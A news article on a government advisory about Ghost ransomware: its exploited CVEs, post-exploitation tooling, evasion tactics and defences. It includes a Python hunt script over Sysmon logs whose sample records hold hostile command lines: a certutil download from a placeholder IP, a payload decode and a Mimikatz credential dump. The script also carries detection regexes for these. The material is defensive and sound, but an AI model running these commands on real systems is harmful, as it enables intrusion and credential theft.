Cybercriminals deploying Ghost ransomware have compromised organizations in more than 70 countries, including healthcare providers, government agencies, schools and universities, and manufacturers. A joint advisory from the Cybersecurity and Infrastructure Security Agency (CISA), the FBI, and MS-ISAC describes a campaign that relies on known, long-patched vulnerabilities in internet-facing software to gain a foothold in victim networks.
A Widespread Cyber Threat That Shows No Signs of Slowing
According to the advisory, Ghost activity dates back to early 2021, and the operators, assessed to be based in China, are indiscriminate: any organization running outdated, internet-facing services is a potential target. Victims include critical infrastructure operators, small and medium-sized businesses, and organizations inside China itself.
One troubling aspect of the campaign is how often the operators change their tradecraft. They rotate the file extensions appended to encrypted files, edit the text of their ransom notes, and swap out the ransomware executables, which complicates attribution. Over time the same group has been tracked under aliases including Cring, Crypt3r, Phantom, Strike, and Rapture.
How Ghost Ransomware Gets In
The operators combine publicly available exploit code with their own tooling to break in. The vulnerabilities they favor are all old, and all have vendor patches available:
- Fortinet FortiOS SSL VPN (CVE-2018-13379): a pre-authentication path traversal in the SSL VPN web portal that lets an attacker read system files, including the session file that holds plaintext VPN credentials. It has been exploited in the wild since 2019.
- Adobe ColdFusion (CVE-2010-2861, CVE-2009-3960): a directory traversal in the ColdFusion administrator console and an XML external entity (XXE) flaw, respectively. Servers still running affected versions are more than a decade out of date but remain a frequent entry point.
- Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207): the three flaws chained as ProxyShell, which give an unauthenticated attacker remote code execution on an unpatched, internet-facing Exchange server. They have been exploited by a wide range of actors, including state-backed groups, since mid-2021.
After gaining access, the attackers typically drop a web shell on the compromised server, deploy Cobalt Strike beacons (a commercial red-team framework that has become a staple of ransomware crews) for command and control, and run Mimikatz to harvest credentials from memory, escalating privileges with publicly available tools before pushing the ransomware payload. Dwell time is short: the advisory notes that Ghost actors rarely spend more than a few days on a network and have gone from initial compromise to encryption within the same day, so detection has to happen during the intrusion rather than after weeks of quiet persistence.
Ghost Ransomware’s Evolving Tactics
Ghost ransomware does not follow a rigid playbook. The operators keep adjusting their techniques to increase damage and evade detection. Notable tactics include:
- Rotating the email addresses listed in ransom notes so that no single address ties the attacks together.
- Using built-in Windows utilities such as CertUtil to download and decode payloads, so that tooling arrives through a signed Microsoft binary rather than a foreign downloader that security products are more likely to flag.
- Frequently modifying the ransomware executables to defeat signature-based antivirus detection.
Security experts say these tactics make the group particularly difficult to contain.
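The CertUtil and Mimikatz tradecraft described above is visible in ordinary process-creation telemetry. The following is an added example, not code from the advisory or from this article: a small hunt over Sysmon Event ID 1 records exported as JSON lines (the field names Image, OriginalFileName, CommandLine, ParentImage and User are the standard Sysmon ones; the records themselves are constructed for illustration, and 203.0.113.10 is a documentation address). It keys on the binary's OriginalFileName rather than its on-disk path, so renaming certutil.exe does not evade it, and it correlates hits per user to surface the download, decode, credential-theft staging chain rather than isolated events. ATT&CK IDs in the tags are T1105 (Ingress Tool Transfer), T1140 (Deobfuscate/Decode Files or Information) and T1003.001 (LSASS Memory).

```python
"""Hunt for CertUtil download/decode abuse and Mimikatz credential dumping in
Sysmon process-creation (Event ID 1) telemetry exported as JSON lines.

Added example; not part of the CISA/FBI/MS-ISAC advisory or the article.
The log records below are constructed for illustration only."""
import json
import re
from typing import Iterable

# Constructed Sysmon Event ID 1 records, one JSON object per line.
SAMPLE_LOG = r'''
{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","OriginalFileName":"CertUtil.exe","CommandLine":"certutil -verify -urlfetch server.cer","ParentImage":"C:\\Windows\\System32\\cmd.exe","User":"CORP\\pki-admin"}
{"EventID":1,"Image":"C:\\Windows\\System32\\certutil.exe","OriginalFileName":"CertUtil.exe","CommandLine":"certutil.exe -urlcache -split -f http://203.0.113.10/update.txt C:\\Users\\Public\\u.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe","User":"CORP\\svc-web"}
{"EventID":1,"Image":"C:\\Users\\Public\\ct.exe","OriginalFileName":"CertUtil.exe","CommandLine":"ct.exe -decode C:\\Users\\Public\\u.txt C:\\Users\\Public\\beacon.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","User":"CORP\\svc-web"}
{"EventID":1,"Image":"C:\\Users\\Public\\m.exe","OriginalFileName":"mimikatz.exe","CommandLine":"m.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","ParentImage":"C:\\Windows\\System32\\cmd.exe","User":"CORP\\svc-web"}
{"EventID":1,"Image":"C:\\Windows\\System32\\notepad.exe","OriginalFileName":"NOTEPAD.EXE","CommandLine":"notepad.exe notes.txt","ParentImage":"C:\\Windows\\explorer.exe","User":"CORP\\alice"}
'''

# -urlcache together with a URL is the classic "certutil as downloader" form.
CERTUTIL_DOWNLOAD = re.compile(r"-urlcache\b.*\b(https?|ftp)://", re.I)   # T1105
# -decode/-decodehex/-encode turn a text blob into (or out of) an executable.
CERTUTIL_DECODE = re.compile(r"-(decode|decodehex|encode)\b", re.I)        # T1140
# Mimikatz module syntax survives even when the binary has been renamed.
MIMIKATZ = re.compile(r"sekurlsa::|lsadump::|privilege::debug", re.I)      # T1003.001


def classify(event: dict) -> list[str]:
    """Return the technique tags that apply to one process-creation event."""
    findings: list[str] = []
    cmd = event.get("CommandLine", "")
    # Key on the PE version resource, not the path: copying certutil.exe to
    # ct.exe changes Image but not OriginalFileName.
    original = event.get("OriginalFileName", "").lower()
    on_disk = event.get("Image", "").lower().rsplit("\\", 1)[-1]
    if original == "certutil.exe":
        if CERTUTIL_DOWNLOAD.search(cmd):
            findings.append("T1105 certutil download")
        if CERTUTIL_DECODE.search(cmd):
            findings.append("T1140 certutil decode")
        if on_disk != "certutil.exe":
            findings.append("renamed certutil")
    if original == "mimikatz.exe" or MIMIKATZ.search(cmd):
        findings.append("T1003.001 mimikatz")
    return findings


def hunt(lines: Iterable[str]) -> list[dict]:
    """Parse JSON-lines Sysmon output and return one alert per suspicious event."""
    alerts = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        event = json.loads(raw)
        if event.get("EventID") != 1:      # only process-creation events
            continue
        tags = classify(event)
        if tags:
            alerts.append({"user": event.get("User"), "image": event.get("Image"),
                           "tags": tags, "cmd": event.get("CommandLine")})
    return alerts


def staged_users(alerts: list[dict], min_stages: int = 2) -> list[str]:
    """Users whose processes hit two or more distinct techniques. Download,
    decode and credential theft from one account is the staging pattern, and
    is far higher confidence than any single certutil invocation."""
    stages: dict[str, set[str]] = {}
    for alert in alerts:
        stages.setdefault(alert["user"], set()).update(t.split()[0] for t in alert["tags"])
    return sorted(user for user, seen in stages.items() if len(seen) >= min_stages)


if __name__ == "__main__":
    found = hunt(SAMPLE_LOG.splitlines())
    for alert in found:
        print(alert["user"], alert["image"], alert["tags"], alert["cmd"])
    print("staged activity:", staged_users(found))
```

The first record (`certutil -verify -urlfetch`) is legitimate PKI administration and is deliberately not flagged; tune the patterns against your own baseline before alerting, because `-decode` has rare legitimate uses on admin workstations. The per-user correlation is what turns three medium-confidence hits into one incident worth paging on.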
Ghost’s Impact on Critical Infrastructure
The most concerning aspect of these attacks is their impact on critical infrastructure: government agencies, hospitals, and manufacturers are among the victims. The Fortinet SSL VPN flaw in particular was also used, in a separate campaign documented by CISA and the FBI in 2020, to gain access to networks supporting U.S. elections.
Fortinet published a fix and a public advisory for CVE-2018-13379 in 2019 and has repeated the warning since, yet many organizations still have not patched. The consequences are disrupted operations, stolen data, and in some cases large ransom demands.
How Organizations Can Protect Themselves
CISA, the FBI, and security researchers emphasize proactive defense. The advisory's key recommendations include:
- Regular backups: keep backups offline or segmented from the source systems so the ransomware cannot reach and encrypt them, and verify that they actually restore.
- Patch known exploited vulnerabilities first: apply vendor updates promptly, prioritizing the internet-facing products listed above and anything in CISA's Known Exploited Vulnerabilities catalog.
- Network segmentation: restrict lateral movement so a compromised edge device or web server cannot reach the rest of the network, and close unused ports such as RDP (3389), FTP (21), and SMB (445) wherever they are exposed.
- Multi-factor authentication (MFA): require phishing-resistant MFA for all privileged accounts and for email services.
Security agencies have also provided specific indicators of compromise (IOCs) and detection methods to help organizations identify potential infections before significant damage occurs.
State-Backed Hackers and Election Systems Targeted
While Ghost ransomware appears to be financially motivated, state-backed hackers have exploited some of the same vulnerabilities for intelligence gathering. In particular, government-backed groups have targeted Fortinet’s SSL VPN flaw (CVE-2018-13379) for years, breaching sensitive networks, including U.S. election systems.
Given the overlap between cybercriminals and state-sponsored actors, security experts warn that leaving systems unpatched creates risks far beyond financial loss. It opens the door to espionage, infrastructure sabotage, and potential national security threats.
A Persistent and Adaptive Threat
Ghost ransomware has already caused significant damage worldwide, and there’s little indication that these attacks will stop anytime soon. As long as organizations continue to run unpatched software, attackers will have a way in.
The latest advisory from CISA, the FBI, and MS-ISAC serves as a stark reminder: businesses and government agencies must take cybersecurity seriously, or they risk becoming the next victims in an ever-growing list of high-profile breaches.